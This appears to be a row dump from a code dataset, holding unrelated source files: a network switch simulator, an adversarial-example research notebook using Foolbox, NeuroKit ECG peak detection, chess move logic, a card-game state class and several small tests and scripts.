max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
fltk/synthpriv/datasets/__init__.py | tudelft-eemcs-dml/fltk-testbed-gr-1 | 0 | 12769951 | from .adult import DistAdultDataset
from .purchase import DistPurchaseDataset
from .synthetic import SyntheticDataset
from .texas import DistTexasDataset
| 0.914063 | 1 |
core/switch.py | kit-tm/fdeval | 1 | 12769952 | from core.consumable import Consumable
from core.events import *
from core.engine import Engine
class Port:
def __init__(self, id):
self.id = id
self.target = None
self.link_out = None
self.link_in = None
self.delegated = None
# This variable is used to calculate the flows that have
# arrived on this port during two decision cycles. The variable
# is managed by the engine and reset there.
self.cnt_flows_arrived = 0
self.cnt_flows_removed = 0
self.flows = {} # map of registered flows
self.arrival_data = []
self.arrival_rate = 0
self.arrival_last = 0
self.arrival_remove = 0
def register_flow(self, flow):
if not self.flows.get(flow.id):
self.cnt_flows_arrived += 1
self.flows[flow.id] = flow
def unregister_flow(self, flow):
if self.flows.get(flow.id):
del self.flows[flow.id]
self.cnt_flows_removed +=1
def get_flows(self):
"""Returns a list of flows that entered the switch via this port"""
return filter(lambda flow: flow[1].is_finished == False, self.flows.items())
def reset_arrival_counter(self, history=10):
self.arrival_data.append(self.cnt_flows_arrived)
self.arrival_last = self.cnt_flows_arrived
self.cnt_flows_arrived = 0
self.arrival_remove = self.cnt_flows_removed
self.cnt_flows_removed = 0
lastn = [i for i in self.arrival_data[-history:]]
#diffs = [v2-v1 for v1, v2 in list(zip(lastn[0:], lastn[1:]))]
self.arrival_rate = 0
if len(lastn) > 0:
self.arrival_rate = sum(lastn)/float(len(lastn))
# avoid flow_arrival_per_port getting more than usen entries
self.arrival_data = self.arrival_data[-history:]
class FlowTable:
def __init__(self, switch):
self.switch = switch
self.cnt_flows = 0
class Switch(Consumable):
def __init__(self, ctx, **kwargs):
super().__init__(ctx, **kwargs);
self.id = kwargs.get("id") # networkx node id
self.label = kwargs.get("label", "NoLabelSet"); # name in topology
self.x = kwargs.get("x"); # coordinates in topology
self.y = kwargs.get("y"); # coordinates in topology
# create a port object for each port of the switch; these are used
# to store and access port related statistics
cnt = 0
self.ports = {}
for n in ctx.topo.graph.neighbors(self.id):
port = Port(cnt)
cnt += 1
port.target = n
port.link_in = ctx.topo.graph.edges[n, self.id]['_link']
port.link_out = ctx.topo.graph.edges[self.id, n]['_link']
self.ports[(n, self.id)] = port
# create a flow table object for this switch
self.flowtable = FlowTable(self)
# logic of the switch is implemented inside the engine; This is
# similar to connecting a switch to a controller
self.engine = kwargs.get("engine", Engine(self.ctx, **kwargs)) # routing engine
self.cnt_backdelegations = 0
self.cnt_adddelegations = 0
def reset_counter(self):
self.cnt_backdelegations = 0
self.cnt_adddelegations = 0
def on_event(self, ev):
# periodic counter for statistics
if isinstance(ev, EVStats):
return self.engine.on_EVSwitchStats(self, ev)
# a new flow arrives at the switch
if isinstance(ev, EVSwitchNewFlow):
return self.engine.on_EVSwitchNewFlow(self, ev)
# the last packet of a flow arrives at the switch
if isinstance(ev, EVSwitchLastPacketOfFlowArrived):
return self.engine.on_EVSwitchLastPacketOfFlowArrived(self, ev)
| 2.734375 | 3 |
scripts/attacks.py | akashkumar25/AnalysisBySynthesis | 59 | 12769953 | # ---
# jupyter:
# jupytext_format_version: '1.2'
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# language_info:
# codemirror_mode:
# name: ipython
# version: 3
# file_extension: .py
# mimetype: text/x-python
# name: python
# nbconvert_exporter: python
# pygments_lexer: ipython3
# version: 3.6.4
# ---
# +
import sys
sys.path.insert(0, './../')
# %load_ext autoreload
# %autoreload 2
# %matplotlib inline
import torch
from torchvision import datasets, transforms
import numpy as np
from matplotlib import pyplot as plt
import foolbox
from foolbox import attacks as fa
# own modules
from abs_models import utils as u
from abs_models import models as mz
from abs_models import attack_utils as au
# -
model = mz.get_VAE(n_iter=10) # ABS, do n_iter=50 for original model
# model = mz.get_VAE(binary=True) # ABS with scaling and binaryzation
# model = mz.get_binary_CNN() # Binary CNN
# model = mz.get_CNN() # Vanilla CNN
# model = mz.get_NearestNeighbor() # Nearest Neighbor, "nearest L2 dist to each class"=logits
# model = mz.get_madry() # Robust network from Madry et al. in tf
# code is agnostic of pytorch/ tensorflow model --> foolbox model
if model.code_base == 'tensorflow':
fmodel = foolbox.models.TensorFlowModel(model.x_input, model.pre_softmax, (0., 1.),
channel_axis=3)
elif model.code_base == 'pytorch':
model.eval()
fmodel = foolbox.models.PyTorchModel(model, # return logits in shape (bs, n_classes)
bounds=(0., 1.), num_classes=10,
device=u.dev())
else:
print('not implemented')
# test model
b, l = u.get_batch(bs=10000) # returns random batch as np.array
pred_label = np.argmax(fmodel.batch_predictions(b), axis=1)
print('score', float(np.sum(pred_label == l)) / b.shape[0])
# # Decision based attacks
# Note that this is only demo code. All experiments were optimized to our compute architecture.
b, l = u.get_batch(bs=1) # returns random batch
# +
import time
start = time.time()
att = fa.DeepFoolL2Attack(fmodel)
metric = foolbox.distances.MSE
criterion = foolbox.criteria.Misclassification()
plt.imshow(b[0, 0], cmap='gray')
plt.title('orig')
plt.axis('off')
plt.show()
# Estimate gradients from scores
if not model.has_grad:
GE = foolbox.gradient_estimators.CoordinateWiseGradientEstimator(0.1)
fmodel = foolbox.models.ModelWithEstimatedGradients(fmodel, GE)
# gernate Adversarial
a = foolbox.adversarial.Adversarial(fmodel, criterion, b[0], l[0], distance=metric)
att(a)
print('runtime', time.time() - start, 'seconds')
print('pred', np.argmax(fmodel.predictions(a.image)))
if a.image is not None: # attack was successful
plt.imshow(a.image[0], cmap='gray')
plt.title('adv')
plt.axis('off')
plt.show()
# -
# # get Trash Adversarials
from foolbox.gradient_estimators import CoordinateWiseGradientEstimator as CWGE
a = np.random.random((1, 28, 28)).astype(np.float32)
a_helper = torch.tensor(torch.from_numpy(a.copy()), requires_grad=True)
fixed_class = 1
GE = CWGE(1.)
opti = torch.optim.SGD([a_helper], lr=1, momentum=0.95)
# +
confidence_level = model.confidence_level # abs 0.0000031, CNN 1439000, madry 60, 1-NN 0.000000000004
logits_scale = model.logit_scale # ABS 430, madry 1, CNN 1, 1-NN 5
a_orig = a
plt.imshow(u.t2n(a[0]), cmap='gray')
plt.show()
for i in range(10000):
logits = fmodel.predictions(a)
probs = u.t2n(u.confidence_softmax(logits_scale*torch.from_numpy(logits[None, :]), dim=1,
const=confidence_level))[0]
pred_class = np.argmax(u.t2n(logits).squeeze())
if probs[fixed_class]>= 0.9:
break
grads = GE(fmodel.batch_predictions, a, fixed_class, (0,1))
a = au.update_distal_adv(a, a_helper, grads, opti)
if i % 1000 == 0:
print(f'probs {probs[pred_class]:.3f} class', pred_class)
fig, ax = plt.subplots(1,3, squeeze=False, figsize=(10, 4))
ax[0, 0].imshow(u.t2n(a[0]), cmap='gray')
ax[0, 1].imshow(u.t2n(grads[0]), cmap='gray')
ax[0, 2].imshow(np.sign(grads[0]), cmap='gray')
plt.show()
plt.imshow(u.t2n(a[0]), cmap='gray')
plt.show()
# -
# # Latent Descent Attack
# +
# only for abs
att = au.LineSearchAttack(model) # BinaryLineSearchAttack
b, l = u.get_batch(bs=200)
advs = att(b, l, n_coarse_steps=50+1, n_ft_steps=2)
for adv in advs:
adv['img'] = adv['img'].cpu().numpy()
for i, (a_i, b_i) in enumerate(zip(advs, b)):
l2 = np.sqrt(a_i['distance'] * 784) # convert from MSE
fig, ax = plt.subplots(1, 2, squeeze=False)
ax[0, 0].set_title(str(a_i['original_label']))
ax[0, 0].imshow(u.t2n(b_i[0]), cmap='gray')
ax[0, 1].set_title(str(a_i['adversarial_label']))
ax[0, 1].imshow(u.t2n(a_i['img'][0]), cmap='gray')
plt.show()
if i ==10:
break
print('mean L2', np.mean([np.sqrt(a_i['distance'] * 784) for a_i in advs]))
| 2.140625 | 2 |
test.py | spokenlore/PythonCalendar | 0 | 12769954 | import time
def main():
start = time.time()
minimumElapsed = .5
while True:
if time.time() - start > minimumElapsed:
print "Loading..."
minimumElapsed += .5
main()
| 3.4375 | 3 |
woodcutter/src/Gamestate.py | cevirici/dominion-woodcutter | 0 | 12769955 | <reponame>cevirici/dominion-woodcutter
# -*- coding: utf-8 -*-
from .Card import *
from .Pile import *
from .Utils import *
class Gamestate:
def __init__(self):
self.cards = []
self.zones = {z: [[] for p in range(PLAYER_COUNT)] for z in PlayerZones}
self.zones.update({z: [] for z in NeutralZones})
self.piles = []
self.player = 0
self.turnNumber = 0
self.turnType = TurnTypes.PREGAME
self.stack = []
self.logLine = 0
self.candidates = []
self.selectedMove = None
self.actions = 0
self.buys = 0
self.coins = 0
self.potions = 0
self.vp = [0 for p in range(PLAYER_COUNT)]
self.coffers = [0 for p in range(PLAYER_COUNT)]
self.debt = [0 for p in range(PLAYER_COUNT)]
self.villagers = [0 for p in range(PLAYER_COUNT)]
self.reductions = []
self.flags = []
def __repr__(self):
return repr(self.move)
def getZone(self, zoneName, player):
if player == -1:
player = self.player
if isinstance(zoneName, PlayerZones):
return self.zones[zoneName][player]
else:
return self.zones[zoneName]
def zoneCount(self, zoneName, player=-1):
return len(self.getZone(zoneName, player))
def zoneContains(self, cardName, zoneName, player=-1):
for card in self.getZone(zoneName, player):
if card.name == cardName:
return True
return False
def addCard(self, cardInfo, zoneName, player=-1):
zone = self.getZone(zoneName, player)
newCard = Card(cardInfo, len(self.cards), zoneName, player)
self.cards.append(newCard)
zone.append(newCard)
def moveCards(self, cardList, src, dest, srcP=-1, destP=-1):
srcZone = self.getZone(src, srcP)
destZone = self.getZone(dest, destP)
movedCards = []
for cardName in cardList:
moved = False
for target in srcZone:
if target.name == cardName:
srcZone.remove(target)
destZone.append(target)
target.move(dest, self)
target.player = self.player if destP == -1 else destP
moved = True
movedCards.append(target)
break
if not moved:
return False
return movedCards
def moveAllCards(self, src, dest, srcP=-1, destP=-1):
srcZone = self.getZone(src, srcP)
destZone = self.getZone(dest, destP)
for card in srcZone:
card.location = dest
card.player = self.player if destP == -1 else destP
destZone += srcZone
srcZone.clear()
| 2.484375 | 2 |
neurokit2/ecg/ecg_peaks.py | danibene/NeuroKit | 0 | 12769956 | # - * - coding: utf-8 - * -
from ..signal import signal_fixpeaks, signal_formatpeaks
from .ecg_findpeaks import ecg_findpeaks
def ecg_peaks(
ecg_cleaned, sampling_rate=1000, method="neurokit", correct_artifacts=False, **kwargs
):
"""**Find R-peaks in an ECG signal**
Find R-peaks in an ECG signal using the specified method. The method accepts unfiltered ECG
signals as input, although it is expected that a filtered (cleaned) ECG will result in better
results.
Parameters
----------
ecg_cleaned : Union[list, np.array, pd.Series]
The cleaned ECG channel as returned by ``ecg_clean()``.
sampling_rate : int
The sampling frequency of ``ecg_signal`` (in Hz, i.e., samples/second). Defaults to 1000.
method : string
The algorithm to be used for R-peak detection. Can be one of ``"neurokit"`` (default),
``"pantompkins1985"``, ``"nabian2018"``, ``"gamboa2008"``, ``"zong2003"``,
``"hamilton2002"``, ``"christov2004"``, ``"engzeemod2012"``, ``"elgendi2010"``,
``"kalidas2017"``, ``"martinez2003"``, ``"rodrigues2021"`` or ``"promac"``.
correct_artifacts : bool
Whether or not to first identify and fix artifacts as defined by
Lipponen & Tarvainen (2019).
**kwargs
Additional keyword arguments, usually specific for each method.
Returns
-------
signals : DataFrame
A DataFrame of same length as the input signal in which occurrences of R-peaks marked as
``1`` in a list of zeros with the same length as ``ecg_cleaned``. Accessible with the keys
``"ECG_R_Peaks"``.
info : dict
A dictionary containing additional information, in this case the samples at which R-peaks
occur, accessible with the key ``"ECG_R_Peaks"``, as well as the signals' sampling rate,
accessible with the key ``"sampling_rate"``.
See Also
--------
ecg_clean, ecg_findpeaks, .signal_fixpeaks
Examples
--------
* **Example 1**: Find R-peaks using the default method (``"neurokit"``).
.. ipython:: python
import neurokit2 as nk
ecg = nk.ecg_simulate(duration=10, sampling_rate=1000)
signals, info = nk.ecg_peaks(ecg, correct_artifacts=True)
@savefig p_ecg_peaks1.png scale=100%
nk.events_plot(info["ECG_R_Peaks"], ecg)
* **Example 2**: Compare different methods
.. ipython:: python
# neurokit (default)
cleaned = nk.ecg_clean(ecg, method="neurokit")
_, neurokit = nk.ecg_peaks(cleaned, method="neurokit")
# pantompkins1985
cleaned = nk.ecg_clean(ecg, method="pantompkins1985")
_, pantompkins1985 = nk.ecg_peaks(cleaned, method="pantompkins1985")
# nabian2018
_, nabian2018 = nk.ecg_peaks(ecg, method="nabian2018")
# hamilton2002
cleaned = nk.ecg_clean(ecg, method="hamilton2002")
_, hamilton2002 = nk.ecg_peaks(cleaned, method="hamilton2002")
# martinez2003
_, martinez2003 = nk.ecg_peaks(ecg, method="martinez2003")
# christov2004
_, christov2004 = nk.ecg_peaks(cleaned, method="christov2004")
# gamboa2008
cleaned = nk.ecg_clean(ecg, method="gamboa2008")
_, gamboa2008 = nk.ecg_peaks(cleaned, method="gamboa2008")
# elgendi2010
cleaned = nk.ecg_clean(ecg, method="elgendi2010")
_, elgendi2010 = nk.ecg_peaks(cleaned, method="elgendi2010")
# engzeemod2012
cleaned = nk.ecg_clean(ecg, method="engzeemod2012")
_, engzeemod2012 = nk.ecg_peaks(cleaned, method="engzeemod2012")
# kalidas2017
cleaned = nk.ecg_clean(ecg, method="kalidas2017")
_, kalidas2017 = nk.ecg_peaks(cleaned, method="kalidas2017")
# rodrigues2021
_, rodrigues2021 = nk.ecg_peaks(ecg, method="rodrigues2021")
# Collect all R-peak lists by iterating through the result dicts
rpeaks = [
i["ECG_R_Peaks"]
for i in [
neurokit,
pantompkins1985,
nabian2018,
hamilton2002,
martinez2003,
christov2004,
gamboa2008,
elgendi2010,
engzeemod2012,
kalidas2017,
rodrigues2021,
]
]
# Visualize results
@savefig p_ecg_peaks2.png scale=100%
nk.events_plot(rpeaks, ecg)
* **Example 3**: Method-agreement procedure ('promac')
.. ipython:: python
ecg = nk.ecg_simulate(duration=10, sampling_rate=500)
ecg = nk.signal_distort(ecg,
sampling_rate=500,
noise_amplitude=0.05, noise_frequency=[25, 50],
artifacts_amplitude=0.05, artifacts_frequency=50)
@savefig p_ecg_peaks3.png scale=100%
info = nk.ecg_findpeaks(ecg, sampling_rate=1000, method="promac", show=True)
References
----------
* ``neurokit``
* **Unpublished.** See this discussion for more information on the method:
https://github.com/neuropsychology/NeuroKit/issues/476
* ``pantompkins1985``
* <NAME>., & <NAME>. (1985). A real-time QRS detection algorithm. IEEE transactions
on biomedical engineering, (3), 230-236.
* ``nabian2018``
* <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. (2018).
An Open-Source Feature Extraction Tool for the Analysis of Peripheral Physiological Data.
IEEE Journal of Translational Engineering in Health and Medicine, 6, 1-11.
doi:10.1109/jtehm.2018.2878000
* ``gamboa2008``
* <NAME>. (2008). Multi-modal behavioral biometrics based on hci and electrophysiology.
PhD ThesisUniversidade.
* ``zong2003``
* <NAME>., <NAME>., <NAME>., & <NAME>. (2003). An open-source algorithm to
detect onset of arterial blood pressure pulses. In Computers in Cardiology, 2003 (pp.
259-262). IEEE.
* ``hamilton2002``
* <NAME>. (2002). Open source ECG analysis. In Computers in cardiology (pp. 101-104).
IEEE.
* ``christov2004``
* <NAME>, Real time electrocardiogram QRS detection using combined adaptive
threshold, BioMedical Engineering OnLine 2004, vol. 3:28, 2004.
* ``engzeemod2012``
* <NAME>., & <NAME>. (1979). A single scan algorithm for QRS-detection and
feature extraction. Computers in cardiology, 6(1979), 37-42.
* <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2012, February). Real
Time Electrocardiogram Segmentation for Finger based ECG Biometrics. In Biosignals (pp.
49-54).
* ``elgendi2010``
* <NAME>., <NAME>., & <NAME>. (2010). Frequency Bands Effects on QRS Detection.
Biosignals, Proceedings of the Third International Conference on Bio-inspired Systems and
Signal Processing, 428-431.
* ``kalidas2017``
* <NAME>., & <NAME>. (2017, October). Real-time QRS detector using stationary wavelet
transform for automated ECG analysis. In 2017 IEEE 17th International Conference on
Bioinformatics and Bioengineering (BIBE) (pp. 457-461). IEEE.
* ``martinez2003``
**Unknown.** Please help us retrieve the correct source!
* ``rodrigues2021``
* <NAME>., <NAME>., <NAME>., & <NAME>. (2015). Novel
real-time low-complexity QRS complex detector based on adaptive thresholding. IEEE
Sensors Journal, 15(10), 6036-6043.
* <NAME>., & <NAME>. (2012). R-peak detection algorithm for ECG using double
difference and RR interval processing. Procedia Technology, 4, 873-877.
* <NAME> & Samoutphonh, Sirisack & <NAME> & <NAME>. (2021).
A Low-Complexity R-peak Detection Algorithm with Adaptive Thresholding for Wearable
Devices.
* ``promac``
* **Unpublished.** It runs different methods and derives a probability index using
convolution. See this discussion for more information on the method:
https://github.com/neuropsychology/NeuroKit/issues/222
* <NAME>., & <NAME>. (2019). A robust algorithm for heart rate variability
time series artefact correction using novel beat classification. Journal of medical
engineering & technology, 43(3), 173-181.
"""
rpeaks = ecg_findpeaks(ecg_cleaned, sampling_rate=sampling_rate, method=method, **kwargs)
if correct_artifacts:
_, rpeaks = signal_fixpeaks(
rpeaks, sampling_rate=sampling_rate, iterative=True, method="Kubios"
)
rpeaks = {"ECG_R_Peaks": rpeaks}
instant_peaks = signal_formatpeaks(rpeaks, desired_length=len(ecg_cleaned), peak_indices=rpeaks)
signals = instant_peaks
info = rpeaks
info["sampling_rate"] = sampling_rate # Add sampling rate in dict info
return signals, info
| 3.1875 | 3 |
preprocess/export_docIds.py | nladuo/snrm | 0 | 12769957 | <filename>preprocess/export_docIds.py
import pymongo
import json
client = pymongo.MongoClient()
db = client.snrm
coll = db.docs
docIds = []
for doc in coll.find({}):
docIds.append(doc["docNo"])
with open("../data/docIds.json", "w") as f:
json.dump(docIds, f)
| 2.6875 | 3 |
tests/source_image_caching_resolver_ut.py | jamieparkinson/loris | 150 | 12769958 | <gh_stars>100-1000
import os
import shutil
import unittest
from tests.abstract_resolver import AbstractResolverTest
from loris import resolver
class SourceImageCachingResolverTest(AbstractResolverTest, unittest.TestCase):
def setUp(self):
super(SourceImageCachingResolverTest, self).setUp()
tests_dir = os.path.dirname(os.path.realpath(__file__))
self.cache_dir = os.path.join(tests_dir, 'cache')
config = {
'source_root': os.path.join(tests_dir, 'img'),
'cache_root': self.cache_dir
}
self.identifier = '01/02/0001.jp2'
self.expected_filepath = os.path.join(
self.cache_dir,
self.identifier
)
self.not_identifier = 'DOES_NOT_EXIST.jp2'
self.expected_format = 'jp2'
self.resolver = resolver.SourceImageCachingResolver(config)
def test_resolve(self):
super(SourceImageCachingResolverTest, self).test_resolve()
# Make sure the file exists in the cache
self.assertTrue(os.path.isfile(self.expected_filepath))
def tearDown(self):
# Clean Up the cache directory
if os.path.exists(self.cache_dir):
shutil.rmtree(self.cache_dir)
| 2.609375 | 3 |
tests/api/single_load/test_optional_types.py | ssato/python-anyconfig | 213 | 12769959 | #
# Copyright (C) 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
import unittest
import anyconfig.api
from . import common
LOADER_TYPES = frozenset(anyconfig.api.list_types())
@unittest.skipIf('yaml' not in LOADER_TYPES,
'yaml loader is not available')
class YamlTestCase(common.TestCase):
kind = 'yaml'
pattern = '*.yml'
@unittest.skipIf('toml' not in LOADER_TYPES,
'toml loader is not available')
class TomlTestCase(YamlTestCase):
kind = 'toml'
pattern = '*.toml'
# vim:sw=4:ts=4:et:
| 1.992188 | 2 |
logic.py | qwlea/chess | 0 | 12769960 | <filename>logic.py
import pygame
# This class internally handles all of the board logic that's necessary to ensure legal moves are played
class Logic:
def __init__(self, bd):
self._board = bd
# This is a utility function that is used by the other functions of this class
def verify_legal(self, col, row, legal_moves):
if 7 >= col >= 0 and 7 >= row >= 0:
legal_moves.add((col, row))
# Returns the set of all board spaces a given piece can move to, disregarding potential discovered checks/pins and
# piece color.
def get_legal_piece(self, piece, opponent, depth):
legal_mvs = set()
tiles = self._board.get_tiles()
coords = piece.get_coords()
col = coords[0]
row = coords[1]
if piece.get_type() // 2 == 0: # Piece is a king
self.verify_legal(col + 1, row, legal_mvs)
self.verify_legal(col, row + 1, legal_mvs)
self.verify_legal(col + 1, row + 1, legal_mvs)
self.verify_legal(col + 1, row - 1, legal_mvs)
self.verify_legal(col - 1, row + 1, legal_mvs)
self.verify_legal(col - 1, row - 1, legal_mvs)
self.verify_legal(col - 1, row, legal_mvs)
self.verify_legal(col, row - 1, legal_mvs)
# This section is for castling purposes. Castling can only be performed when all of the spaces in between a
# king and a rook are not under attack by the opposing player and neither the king or rook has moved.
if depth == 0:
opp_mvs = self.get_legal_player(opponent)
if piece.get_n_move() and tiles[col + 3][row].get_piece() is not None and \
tiles[col + 3][row].get_piece().get_n_move():
can_castle = True
for i in range(col, col + 3):
if (i, row) in opp_mvs: can_castle = False
for i in range(col + 1, col + 3):
if tiles[i][row].get_piece() is not None: can_castle = False
if can_castle: legal_mvs.add((col + 2, row))
if piece.get_n_move() and tiles[col - 4][row].get_piece() is not None and \
tiles[col - 4][row].get_piece().get_n_move():
can_castle = True
for i in range(col - 3, col + 1):
if (i, row) in opp_mvs: can_castle = False
for i in range(col - 3, col):
if tiles[i][row].get_piece() is not None: can_castle = False
if can_castle: legal_mvs.add((col - 2, row))
elif piece.get_type() // 2 == 1: # Piece is a queen
tmp_col = col + 1
tmp_row = row + 1
while tmp_col <= 7 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row += 1
tmp_col = col - 1
tmp_row = row + 1
while tmp_col >= 0 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row += 1
tmp_col = col + 1
tmp_row = row - 1
while tmp_col <= 7 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row -= 1
tmp_col = col - 1
tmp_row = row - 1
while tmp_col >= 0 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row -= 1
tmp_col = col + 1
while tmp_col <= 7:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col += 1
tmp_col = col - 1
while tmp_col >= 0:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col -= 1
tmp_row = row + 1
while tmp_row <= 7:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row += 1
tmp_row = row - 1
while tmp_row >= 0:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row -= 1
elif piece.get_type() // 2 == 2: # Piece is a rook
tmp_col = col + 1
while tmp_col <= 7:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col += 1
tmp_col = col - 1
while tmp_col >= 0:
self.verify_legal(tmp_col, row, legal_mvs)
if tiles[tmp_col][row].get_piece() is not None: break
tmp_col -= 1
tmp_row = row + 1
while tmp_row <= 7:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row += 1
tmp_row = row - 1
while tmp_row >= 0:
self.verify_legal(col, tmp_row, legal_mvs)
if tiles[col][tmp_row].get_piece() is not None: break
tmp_row -= 1
elif piece.get_type() // 2 == 3: # Piece is a knight
self.verify_legal(col + 1, row + 2, legal_mvs)
self.verify_legal(col + 2, row + 1, legal_mvs)
self.verify_legal(col - 1, row + 2, legal_mvs)
self.verify_legal(col + 2, row - 1, legal_mvs)
self.verify_legal(col - 2, row + 1, legal_mvs)
self.verify_legal(col + 1, row - 2, legal_mvs)
self.verify_legal(col - 1, row - 2, legal_mvs)
self.verify_legal(col - 2, row - 1, legal_mvs)
elif piece.get_type() // 2 == 4: # Piece is a bishop
tmp_col = col + 1
tmp_row = row + 1
while tmp_col <= 7 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row += 1
tmp_col = col - 1
tmp_row = row + 1
while tmp_col >= 0 and tmp_row <= 7:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row += 1
tmp_col = col + 1
tmp_row = row - 1
while tmp_col <= 7 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col += 1
tmp_row -= 1
tmp_col = col - 1
tmp_row = row - 1
while tmp_col >= 0 and tmp_row >= 0:
self.verify_legal(tmp_col, tmp_row, legal_mvs)
if tiles[tmp_col][tmp_row].get_piece() is not None: break
tmp_col -= 1
tmp_row -= 1
elif piece.get_type() // 2 == 5: # Piece is a pawn
if piece.get_type() % 2 == 0: # Piece is white
if piece.get_coords()[1] == 1 and tiles[col][row + 1].get_piece() is None and tiles[col][row + 2].get_piece() is None:
legal_mvs.add((col, row + 2))
if tiles[col][row + 1].get_piece() is None:
legal_mvs.add((col, row + 1))
if col + 1 <= 7 and row + 1 <= 7 and tiles[col + 1][row + 1].get_piece() is not None:
legal_mvs.add((col + 1, row + 1))
if col - 1 >= 0 and row + 1 <= 7 and tiles[col - 1][row + 1].get_piece() is not None:
legal_mvs.add((col - 1, row + 1))
# En passant
if col + 1 <= 7 and row + 1 <= 7 and tiles[col + 1][row].get_piece() is not None and\
tiles[col + 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col + 1][row].get_piece().get_d_move():
legal_mvs.add((col + 1, row + 1))
if col - 1 >= 0 and row + 1 <= 7 and tiles[col - 1][row].get_piece() is not None and\
tiles[col - 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col - 1][row].get_piece().get_d_move():
legal_mvs.add((col - 1, row + 1))
else: # Piece is black
if piece.get_coords()[1] == 6 and tiles[col][row - 1].get_piece() is None and tiles[col][row - 2].get_piece() is None:
legal_mvs.add((col, row - 2))
if tiles[col][row - 1].get_piece() is None:
legal_mvs.add((col, row - 1))
if col + 1 <= 7 and row - 1 >= 0 and tiles[col + 1][row - 1].get_piece() is not None:
legal_mvs.add((col + 1, row - 1))
if col - 1 >= 0 and row - 1 >= 0 and tiles[col - 1][row - 1].get_piece() is not None:
legal_mvs.add((col - 1, row - 1))
# En passant
if col + 1 <= 7 and row - 1 >= 0 and tiles[col + 1][row].get_piece() is not None and\
tiles[col + 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col + 1][row].get_piece().get_d_move():
legal_mvs.add((col + 1, row - 1))
if col - 1 >= 0 and row - 1 >= 0 and tiles[col - 1][row].get_piece() is not None and\
tiles[col - 1][row].get_piece().get_type() % 2 != piece.get_type() % 2 and\
tiles[col - 1][row].get_piece().get_d_move():
legal_mvs.add((col - 1, row - 1))
return legal_mvs
# returns the set of all legal moves a player can make, still disregarding discovered checks/pins and piece color
def get_legal_player(self, player):
legal_mvs = set()
for piece in player.get_owned():
for coords in self.get_legal_piece(piece, None, 1):
legal_mvs.add(coords)
return legal_mvs
# Safely checks if a given move is legal by simulating the play on the board and then reverting all changes
def safe_check_legal(self, selected_piece, target_tile, player, opponent):
if target_tile.get_coords() not in self.get_legal_piece(selected_piece, opponent, 0): return False
if target_tile.get_piece() is not None and\
target_tile.get_piece().get_type() % 2 == selected_piece.get_type() % 2: return False
tmp_piece = target_tile.get_piece()
# This simulates a capture so that capturing a piece that has put the turn player's king in check is legal
if tmp_piece is not None:
opponent.get_owned().remove(tmp_piece)
tmp_tile = selected_piece.get_tile()
selected_piece.change_tiles(target_tile)
king_coords = player.get_king().get_coords()
if king_coords in self.get_legal_player(opponent):
selected_piece.change_tiles(tmp_tile)
target_tile.set_piece(tmp_piece)
if tmp_piece is not None:
opponent.get_owned().add(tmp_piece)
return False
selected_piece.change_tiles(tmp_tile)
target_tile.set_piece(tmp_piece)
if tmp_piece is not None:
opponent.get_owned().add(tmp_piece)
return True
# Gets the "true" legal spaces a piece can move to, the spaces that won't leave the player's king in check
def get_true_legal_piece(self, piece, player, opponent):
true_legal = set()
for coords in self.get_legal_piece(piece, opponent, 0):
if self.safe_check_legal(piece, self._board.get_tile(coords), player, opponent):
true_legal.add(coords)
return true_legal
# Gets the "true" legal spaces all of a player's pieces can move to that won't leave that player's king in check
def get_true_legal_player(self, player, opponent):
true_legal = set()
for piece in player.get_owned():
for coords in self.get_true_legal_piece(piece, player, opponent):
true_legal.add(coords)
return true_legal
# Checks all possible legal moves a player can make to verify whether the game is in stale/checkmate
# "NM" == No Mate, "SM" == Stalemate, "CM" == Checkmate
def safe_check_mate(self, player, opponent):
for piece in player.get_owned():
for tile_coords in self.get_legal_piece(piece, opponent, 0):
if self.safe_check_legal(piece, self._board.get_tile(tile_coords), player, opponent):
return "NM"
king_coords = player.get_king().get_coords()
if king_coords not in self.get_legal_player(opponent):
return "SM"
return "CM"
| 3.640625 | 4 |
josm/uniteStopAreaRelationsByName.py | mapanica/scripts | 0 | 12769961 | <reponame>mapanica/scripts
#!/bin/jython
'''
This code is released under the
WTFPL – Do What the Fuck You Want to Public License.
'''
from javax.swing import JOptionPane
from org.openstreetmap.josm import Main
import org.openstreetmap.josm.command as Command
import org.openstreetmap.josm.data.osm.Node as Node
